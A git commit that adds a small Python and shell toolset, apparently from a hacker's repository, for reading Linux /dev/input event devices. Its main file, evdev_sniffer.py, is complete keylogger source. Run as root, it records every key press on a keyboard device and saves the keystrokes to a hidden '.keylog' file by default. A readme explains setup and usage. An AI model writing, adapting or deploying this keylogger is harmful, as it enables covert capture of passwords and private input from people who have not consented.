commit f673c4b83e24a3d580cee4cf6b6268d3fdc63e45 Author: your-favorite-hacker Date: Fri May 29 22:53:17 2015 +0200 added event_sniffer diff --git a/evdev_sniffer.py b/evdev_sniffer.py new file mode 100755 index 0000000..59efad5 --- /dev/null +++ b/evdev_sniffer.py @@ -0,0 +1,80 @@ +#!/usr/bin/env python2 +# +# ufh 2015 +# + +import os +import sys +import evdev +import argparse + +def rootCheck(): + uid=os.getuid() + if uid != 0: + print '[*] You need r00t privileges to open event0' + return False + return True + +def run(args): + + if not rootCheck(): + sys.exit(1) + + fw = open(args.outfile,'wb') + + dList = evdev.list_devices() + try: + dList.index(args.device) + + except ValueError, e: + print 'Problem opening input: ',e + sys.exit(1) + + dev = evdev.InputDevice(args.device) + name = dev.name + phys = dev.phys + print '[*] Found %s@%s' % (name,phys ) + + for e in dev.read_loop(): + if e.type == evdev.ecodes.EV_KEY: + + # get the categorzied object + ek = evdev.categorize(e) + # key_down + if ek.keystate == 1: + # print to console + if args.output: + print ek.keycode + + # bring it in the right format + data = "%s" % ek.keycode + data = data.split('_')[1] + if data == 'SPACE' or data == 'BACKSPACE' or data == 'TAB' or data == 'ENTER': + data = ' %s ' % data + else: + data = '%s' % data + data = data.lower() + + fw.write(data) + fw.flush() + + fw.close() + +def main(): + parser_desc = 'event keyboard sniffer' + prog_desc = 'event_sniffer.py' + parser = argparse.ArgumentParser( prog = prog_desc, description = parser_desc) + parser.add_argument('-o','--outfile',dest='outfile',required=False,action='store',help='where to write the sniffed data') + parser.add_argument('-d','--device',dest='device',required=False,action='store',help='different event device to sniff') + parser.add_argument('-O','--output',dest='output',required=False,action='store',help='print logged characters to screen') + args = parser.parse_args() + if not args.device: + args.device = '/dev/input/event0' + + if not args.outfile: + args.outfile = '.keylog' + + run(args) + +if __name__ == '__main__': + main() diff --git a/gen_keymap.sh b/gen_keymap.sh new file mode 100755 index 0000000..6c74998 --- /dev/null +++ b/gen_keymap.sh @@ -0,0 +1,8 @@ +#!/bin/sh +# +# run as root, uses dumpkeys +# +echo 'ev1l blackh4t t00l - just kidding' +echo "myDict={\\" +dumpkeys |grep "^keycode"|sed -e 's/ / /g'|sed -e 's/ / /g'|cut -d ' ' -f 2,4|sed 's/ /:\"/g'|sed -e 's/$/\",/g'|tr -d '\n' +echo "}" diff --git a/map_devices.py b/map_devices.py new file mode 100755 index 0000000..d66cff9 --- /dev/null +++ b/map_devices.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python2 +# script for printing device information of /dev/input/event* devices +# + +import os +import sys +import evdev as ev + +def checkRoot(): + if os.getuid()!=0: + print '[*] You need root for that' + return False + return True + +if not checkRoot(): + sys.exit(1) + +devList = ev.list_devices() +devList.reverse() +for inp in devList: + dev = ev.InputDevice(inp) + print "-"*60 + print "[%s]" % inp + print "%s\n%s\n%s" % (dev.name, dev.info,dev.phys) +print "-"*60 diff --git a/readme.txt b/readme.txt new file mode 100644 index 0000000..bffd8fd --- /dev/null +++ b/readme.txt @@ -0,0 +1,52 @@ +event toolset +============= + +little toolset for logging information from /dev/input/event* devices. +for the sniffer i first opened the device by myself and parsed it, it worked. but worked much +better with the evdev library. +please be aware that root privs are needed. + +prerequisites +------------- +https://python-evdev.readthedocs.org/en/latest/ +pip2 install evdev + +map_devices.py +-------------- +just print out information about all event devices on your system. +# python2 map_devices.py +[...] +------------------------------------------------------------ +[/dev/input/event14] +Video Bus +bus: 0019, vendor 0000, product 0006, version 0000 +LNXVIDEO/video/input0 +------------------------------------------------------------ +[/dev/input/event15] +SynPS/2 Synaptics TouchPad +bus: 0011, vendor 0002, product 0007, version 01b1 +isa0060/serio1/input0 +------------------------------------------------------------ +[...] + +evdev_sniffer.py +---------------- +keyboard sniffer using the evdev library. write per default the logged data to .keylog ;) + +gen_keymap.sh +------------- +simple shellscript generating keymap for event_sniffer.py +event_sniffer is not using the evdev library, so it is more independent. + +event_sniffer.py +---------------- +well like evdev_sniffer but without the evdev_library :) + +thanks +------ +thanks goes out to stealth for pointing me to this neat trick, he implemented back then via injectso. +(http://stealth.openwall.net/local/injectso-0.52.tgz) + +author +------ +dash@hack4.org